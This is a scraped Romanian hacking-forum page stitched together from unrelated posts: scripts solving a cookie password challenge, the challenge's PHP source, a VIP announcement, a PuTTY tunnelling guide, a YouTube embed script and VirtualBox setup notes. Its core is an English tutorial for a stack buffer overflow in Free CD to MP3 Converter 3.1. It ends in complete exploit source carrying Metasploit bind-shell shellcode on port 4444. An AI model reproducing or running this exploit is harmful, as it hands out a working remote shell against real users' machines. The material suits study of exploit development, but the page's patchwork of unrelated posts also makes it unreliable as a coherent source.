Leaderboard

Programul /* * To change this template, choose Tools | Templates * and open the template in the editor. */ package rstchallenge; import java.io.IOException; import java.net.*; import java.io.*; /** * * @author valentin */ public class RstChallenge { /** * @param args the command line arguments */ public static int AflaLungimeaParolei(URL url) throws IOException { String string=""; for(int i=0;i<512;i++) string+='a'; string="pw="+string; //System.out.println(string); URLConnection urlConn=url.openConnection(); urlConn.setRequestProperty("Cookie", string); urlConn.connect(); DataInputStream theHTML = new DataInputStream(urlConn.getInputStream()); String st=theHTML.readLine(); String[] str=st.split("</span>"); for(int i=0;i<512;i++) if(str[i].charAt(0)=='a') return i; //System.out.println(theHTML.readLine()); return 0; } public static void incearcaPass(URL url,char x,char[] pass,int lungimeaParolei) throws IOException { String string=""; for(int i=0;i<512;i++) string+=x; string="pw="+string; URLConnection urlConn=url.openConnection(); urlConn.setRequestProperty("Cookie", string); urlConn.connect(); DataInputStream theHTML = new DataInputStream(urlConn.getInputStream()); String st=theHTML.readLine(); String[] str=st.split("</span>"); for(int i=0;i<lungimeaParolei;i++) if(str[i].contains("green")) pass[i]=x; } public static void main(String[] args) throws MalformedURLException, IOException { URL url=new URL("http://crs12decoder.comoj.com/findpw.php"); int lungimeaParolei=AflaLungimeaParolei(url); System.out.println("Am aflat lungimea parolei: "+lungimeaParolei); char[] pass=new char[lungimeaParolei]; for(char x='a';x<='z';x++) { incearcaPass(url,x,pass,lungimeaParolei); System.out.println("Acum incerc "+x); } //Show the pass System.out.println("Parola este:"); for(int i=0;i<lungimeaParolei;i++) System.out.print(pass[i]); } } Log-ul programului run: Am aflat lungimea parolei: 391 Acum incerc a Acum incerc b Acum incerc c Acum incerc d Acum incerc e Acum incerc f Acum incerc g Acum incerc h Acum incerc i Acum incerc j Acum incerc k Acum incerc l Acum incerc m Acum incerc n Acum incerc o Acum incerc p Acum incerc q Acum incerc r Acum incerc s Acum incerc t Acum incerc u Acum incerc v Acum incerc w Acum incerc x Acum incerc y Acum incerc z Parola este: (ascuns inten?ionat) BUILD SUCCESSFUL (total time: 45 seconds) P.S.: Timpul mare este din cauza ca sunt pe dial-up (128kbps). Pentru curio?i aici java RstChallenge

Am inceput sa facem putina ordine pe aici. Unul din lucrurile importante a fost sa alegem niste membri mai importanti si sa ii promovam la rangul de V.I.P. Am ales in functie de posturile fiecaruia, de ce impresie ne-au creat acesti membri. Nu sunt neaparat membri cu 1000 de post-uri, nu e important numarul de posturi, dar aceste persoane, cel putin momentan ne-au demonstrat ca sunt mai speciale si ca merita ceva in plus. Desigur, cunoastem cat de cat aceste persoane, am discutat cu ele si stim de ce sunt capabile. Aceste persoane sunt: - Andrei - Andrewboy - unu_1234567 - tex - tromfil - Synthesis - Birkoff - tdxev - Cheater - denjacker (daemien) Runda 2, noi membri VIP: - 3348399 - Zatarra - ZeroCold Runda 3: - Xander - wildchild Asteptam si de la restul posturi de calitate si va puteti trezi ca si ei, mai curand sau mai tarziu ca sunteti VIP. Pe langa accesul la "VIP Area", zona privata unde au acces doar membri VIP, vor mai avea sprijinul nostru si al persoanelor care stiu ce e respectul in orice probleme ar intampina. Desigur, rangul este si un titlu onorific.

[+]Written By D4rk357 [+]Special thanks to Peter Van Eckhoutte for his awesome Exploit writing series . [+]Thanks to Fb1h2s for helping me out in the way [+]garage4hackers In this tutorial i will start from scratch and build a working exploit. A public exploit for this is already available here Free CD to MP3 Converter 3.1 Buffer Overflow Exploit First step is downloading and installing the vulnerable application from here Application Install Immunity Debugger or ollydbg or windbg anyone of it would do . Now we will write a simple python code which will generate a .wav file and test the application against it . handle=open("crash.wav","a") Crap="\x41"*30000 handle.write(Crap) This little code upon execution will generate a file with the name of crash.wav Open the debugger of your choice in my case immunity debugger . Open the Executable of CD to MP3 converter and then click on execute. Open: Execute: Now open your Crash.wav file in CD to MP3 converter in option wav to wav converter and BOOM the application Dies instantly . NOw check your Debugger for what exactly happened . Woot Woot Eip has been overwritten . Not only EIP but a few more registers have been overwritten thus increasing our chance to make a Working exploit for this vulnerability. Now The next step is to determine the Exact position at which EIP is overwritten . For that We will use a couple of tools which comes with metasploit . On windows Platform Open Cygwin and then browse to tools directory of metasploit. Once inside it execute pattern_create.rb script which generates unique characters of whichever size you want . By reducing the size of crap again and again in my script and getting a crash i figured it out a string of 5000 unique characters will be more than enough. Syntax: ./pattern_create.rb 5000 once the pattern is created copy it and put it in place of Crap . Now Execute the application from debugger again and put in the newly generated Crash.wav(Delete previous Crash.wav file before doing it as i am opening the file in append mode). Check the Debugger again and you can see some numbers in the EIP which in my case is 31684630 Now in Cygwin Shell we will run pattern_offset to check where exactly EIP is being overwritten . Syntax: ./pattern_offset.rb 31684630 5000 And the location it gives me is 4112 great. So Just to Cross Check that the position of EIP given by the tool is correct we will write a small script . handle=open("crash.wav","a") Crap="\x41"*4112 Eip="\x42"*4 handle.write(Crap) Again open the program through immunity debugger Execute it . After the application crashes check the Eip and you find there 42424242 which means the address found by the tool is perfect . Now we have to find the location of a command in dll file which calls/goes to esp like jmp esp etc. Now we will load the the application again in debugger and search jmp esp command in every dll that is being loaded .( In immunity debugger we can take a look at executable module screen and double click on each dll that is being loaded and then search for the specific command in that address space. After some tinkering out we will find that the dll winmm.dll has a jmp esp command at 76B43ADC Great now we have almost everything we need to make a workable exploit . the address 76 B4 3A DC will be mentioned as \xDC \x3A \xB4 \x76 since we are passing it as a string to EIP . We will use win32 bind shell provided by metasploit encoded in alpha2 encoder We will add some NOPS ( no operation bytes) before starting our shellcode because generally some bytes at the starting are not interpreted by processor as command so it could cause our exploit to fail . Adding Nops would increase the reliability of exploit . And we get a telnet connection \m/ [P.S] You will have to write your own exploit(modify EIP) as i used a hard coded address Dont Try Post Mortem degubbing .. Debugger is not catching it ( Atleast in my computer) P.S here's the source Code: handle=open("final.wav","a") Crap="\x41"*4112 Eip="\xDC\x3A\xB4\x76" # win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com ShellCode=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x43" "\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x53\x32\x41\x42\x41\x32" "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x62" "\x4a\x48\x6b\x70\x4d\x38\x68\x6c\x39\x4b\x4f\x79\x6f\x6b\x4f\x73" "\x50\x4c\x4b\x72\x4c\x46\x44\x57\x54\x4e\x6b\x31\x55\x67\x4c\x4e" "\x6b\x63\x4c\x34\x45\x62\x58\x46\x61\x48\x6f\x4e\x6b\x50\x4f\x44" "\x58\x6c\x4b\x51\x4f\x45\x70\x44\x41\x6a\x4b\x70\x49\x6e\x6b\x35" "\x64\x4c\x4b\x53\x31\x78\x6e\x75\x61\x6b\x70\x4f\x69\x6e\x4c\x4b" "\x34\x4f\x30\x53\x44\x57\x77\x6f\x31\x4b\x7a\x74\x4d\x75\x51\x69" "\x52\x68\x6b\x48\x74\x57\x4b\x70\x54\x64\x64\x47\x58\x50\x75\x6d" "\x35\x4c\x4b\x31\x4f\x36\x44\x56\x61\x78\x6b\x63\x56\x6c\x4b\x54" "\x4c\x70\x4b\x4e\x6b\x53\x6f\x75\x4c\x47\x71\x5a\x4b\x63\x33\x54" "\x6c\x4e\x6b\x6b\x39\x30\x6c\x44\x64\x35\x4c\x71\x71\x5a\x63\x34" "\x71\x6b\x6b\x72\x44\x6c\x4b\x37\x33\x76\x50\x4e\x6b\x71\x50\x56" "\x6c\x6c\x4b\x44\x30\x65\x4c\x4c\x6d\x4c\x4b\x77\x30\x35\x58\x61" "\x4e\x62\x48\x6c\x4e\x62\x6e\x44\x4e\x38\x6c\x50\x50\x4b\x4f\x5a" "\x76\x45\x36\x70\x53\x41\x76\x32\x48\x70\x33\x56\x52\x45\x38\x42" "\x57\x72\x53\x34\x72\x63\x6f\x72\x74\x6b\x4f\x78\x50\x72\x48\x38" "\x4b\x58\x6d\x6b\x4c\x65\x6b\x42\x70\x49\x6f\x69\x46\x71\x4f\x6c" "\x49\x6a\x45\x65\x36\x4f\x71\x4a\x4d\x35\x58\x53\x32\x50\x55\x32" "\x4a\x35\x52\x49\x6f\x48\x50\x31\x78\x7a\x79\x36\x69\x4c\x35\x6c" "\x6d\x70\x57\x39\x6f\x6e\x36\x70\x53\x32\x73\x62\x73\x56\x33\x52" "\x73\x73\x73\x52\x73\x33\x73\x30\x53\x6b\x4f\x4a\x70\x35\x36\x75" "\x38\x52\x31\x41\x4c\x61\x76\x50\x53\x4d\x59\x4d\x31\x4d\x45\x55" "\x38\x69\x34\x56\x7a\x42\x50\x5a\x67\x36\x37\x79\x6f\x7a\x76\x61" "\x7a\x76\x70\x66\x31\x73\x65\x39\x6f\x68\x50\x41\x78\x4d\x74\x4e" "\x4d\x76\x4e\x68\x69\x42\x77\x79\x6f\x59\x46\x36\x33\x66\x35\x69" "\x6f\x6e\x30\x45\x38\x4b\x55\x51\x59\x6f\x76\x72\x69\x42\x77\x6b" "\x4f\x4a\x76\x70\x50\x46\x34\x36\x34\x53\x65\x79\x6f\x6e\x30\x6c" "\x53\x65\x38\x4b\x57\x70\x79\x5a\x66\x52\x59\x30\x57\x69\x6f\x6a" "\x76\x30\x55\x59\x6f\x6e\x30\x70\x66\x70\x6a\x53\x54\x72\x46\x62" "\x48\x65\x33\x50\x6d\x6c\x49\x4d\x35\x31\x7a\x52\x70\x70\x59\x44" "\x69\x7a\x6c\x4c\x49\x69\x77\x51\x7a\x71\x54\x4f\x79\x4b\x52\x34" "\x71\x39\x50\x4c\x33\x4d\x7a\x6b\x4e\x71\x52\x44\x6d\x6b\x4e\x37" "\x32\x54\x6c\x4e\x73\x4e\x6d\x33\x4a\x56\x58\x6c\x6b\x6c\x6b\x6e" "\x4b\x53\x58\x64\x32\x69\x6e\x6c\x73\x44\x56\x6b\x4f\x73\x45\x47" "\x34\x4b\x4f\x79\x46\x33\x6b\x42\x77\x73\x62\x30\x51\x73\x61\x72" "\x71\x62\x4a\x33\x31\x42\x71\x50\x51\x72\x75\x50\x51\x49\x6f\x78" "\x50\x71\x78\x4e\x4d\x39\x49\x75\x55\x6a\x6e\x70\x53\x4b\x4f\x59" "\x46\x32\x4a\x4b\x4f\x49\x6f\x56\x57\x69\x6f\x5a\x70\x4e\x6b\x33" "\x67\x49\x6c\x6d\x53\x39\x54\x55\x34\x39\x6f\x4b\x66\x31\x42\x69" "\x6f\x4a\x70\x62\x48\x78\x70\x4d\x5a\x35\x54\x63\x6f\x70\x53\x39" "\x6f\x4e\x36\x39\x6f\x38\x50\x43") nops="\x90"*50 handle.write(Crap+Eip+nops+ShellCode) #Sursa: aici.

Uploaded with ImageShack.us m-am folosit de lungimea data de em, sa nu o mai scot eu inca o data import urllib2 import string import time target = "http://crs12decoder.comoj.com/findpw.php" ALPHA = 'abcdefghijklmnopqrstuvwxyz' currentpassword = ['a' for i in range(391)] for i in range(391): currentpassword[i] = 'a' def trypassword(letter): global currentpassword, target temp = '' for i in range(391): temp += letter opener = urllib2.build_opener() opener.addheaders.append(('Cookie','pw=' + temp)) try: f = opener.open(target) except: print 'Connection Timed Out' trypassword(letter) lines = f.readline() chars = lines.split('</span>') for i in range(391): if 'green' in chars[i]: currentpassword[i] = letter for letter in ALPHA: print 'Trying', letter trypassword(letter) password = '' for i in currentpassword: password += i print password

<?php if(!isset($_COOKIE["pw"])){ setcookie("pw", "empty", time()+3600); header( "refresh:0;url=" ); } $correct = array('n','e','v','e','r','g','e','t','l','o','s','t'); $pw = $_COOKIE["pw"]; if($pw == "empty"){ echo 'crackme'; }else{ $exp = str_split($pw); for($i=0; $i<=11; $i++){ if(isset($exp[$i])){ if($exp[$i] == $correct[$i]){ $exp[$i] = '<span style="color:green">'.$correct[$i].'</span>'; }else{ $exp[$i] = '<span style="color:red">'.$exp[$i].'</span>';} } } for($i=0; $i<count($exp); $i++){ echo $exp[$i]; } if(isset($_COOKIE["pw"])){ if($pw=='nevergetlost'){ echo '<br><br><span style="color:green">OK</span>'; }else{ echo '<br><br><span style="color:red">Wrong!</span>'; } } } ?>

Johnny Maker - Summer is love (Molto Haus Mix)

nu filemanager te chinui cu download

Stiai ca atunci cand navighezi pe net traficul poate fi interceptat ? In tutorialul asta voi prezenta o metoda destul de buna de ati ascunde ip tot ce iti trebuie este "putty" il gasesti pe google si un proxy https pe portu 443 (conexiune securizata) Dupa ce ai descarcat putty setarile sunt simple... Scrii IP si portul in fereastra Session Dati un nume conexiunii in fereastra Windows/Behavior Connexion/Data - Scrii useru si password Aici lasi NONE Aici trebuie bifate cele 2 optiuni: Don't start a shell or command at all - Daca nu o bifati conexiunea cu serveru nu poate fi realizata pt ca serveru nu este setat sa accepte comenzi shell si va intrerupe conexiunea deci trebuie bifata Aici trebuie bifate primele 2 optiuni, la Source port pui port 1080 la Destination selectezi optiunea Dynamic apoi dai click pe add Salveaza setarile create in fereastra Session acolo unde ai pus ip si portul serverului, la save session pui orice nume apoi click pe save Apoi Dai click pe OPEN si va rezulta asa: Asta a fost tot ! Poti descarca Proxyfier care va prelua tot traficul la browsere, programe etc Serverul din poze l-am sters pt ca este un server privat (este al meu) nu lasa loguri de loc

<?php //bagam codul clipului in vector $clipuri = array( 0 => "wK2U0dYZeQI", 1 => "YFK6H_CcuX8", 2 => "ctLnNQOVg0E" ); //alegem la intamplare un cod din vector $rand = $clipuri[rand(0,2)]; //afisam clipul echo '<iframe width="425" height="349" src="http://www.youtube.com/embed/' . $rand . '" frameborder="0" allowfullscreen></iframe>'; ?> Live demo: http://infosource.cz.cc/clipuri.php

Clipurile le pui in partea asta: //bagam codul clipului in vector $clipuri = array( 0 => "wK2U0dYZeQI", 1 => "YFK6H_CcuX8", 2 => "ctLnNQOVg0E" ); Ce vezi tu aici, este ce vine in link-ul http://www.youtube.com/watch?v=PoTEnaAI9Fo, de exemplu, dupa v=. Tu doar pui in continuare, de exemplu: /bagam codul clipului in vector $clipuri = array( 0 => "wK2U0dYZeQI", 1 => "YFK6H_CcuX8", 2 => "ctLnNQOVg0E", 3 => "PoTEnaAI9Fo" ); Mai jos, modifici //alegem la intamplare un cod din vector $rand = $clipuri[rand(0,3)]; Practic, linia asta spune sa ia un clip aleatoriu, de la 0 la 3. Daca ai... 1000 de videoclipuri, pui (0,1000). Daca vrei doar... 100 din ele, si alea sunt de la.. 100 la 199, pui (100,199). Cam atat. PS: Bravo lui Synthesis.

Chiar dac? ve?i instala VBOX din porturi, procesul este un pic mai complicat decât în general... Pasul 1. Instalarea din porturi ----------------------------------------------- cd /usr/ports/emulators/virtualbox make install clean Pasul 2. Cateva retu??ri ------------------------------------------------------------- F?r? aceaste confuri aplica?ia nu o s? mearg?... Mont?m procu mount -t procfs proc /proc Inc?rc?m modulele de kernel vbox: kldload vboxdrv kldload vboxnetflt Ad?ug?m uz?ru in grupu vboxusers: pw groupmod vboxusers -m <uz?r> Îl b?g?m supozitoru mai adânc ca s? nu iasa la boot (Ad?uga?i astea in /boot/loader.conf) vboxdrv_load="YES" vboxnetflt_load="YES" ?i la fel facem cu procu în /etc/fstab proc /proc procfs rw 0 0 Pasul 3. Te împiedici ?i î?i fracturezi coloana ---------------------- Porni?i vbox din consola ?i ar trebui s? mearg?(mai bine decat tine dup? ce ai paralizat...) virtualBox Not?: -------- dac? e?ti pe 64 de bi?tari ii dai a?a la kernel: option COMPAT_IA32 S? trai?i ?i mul?am fain!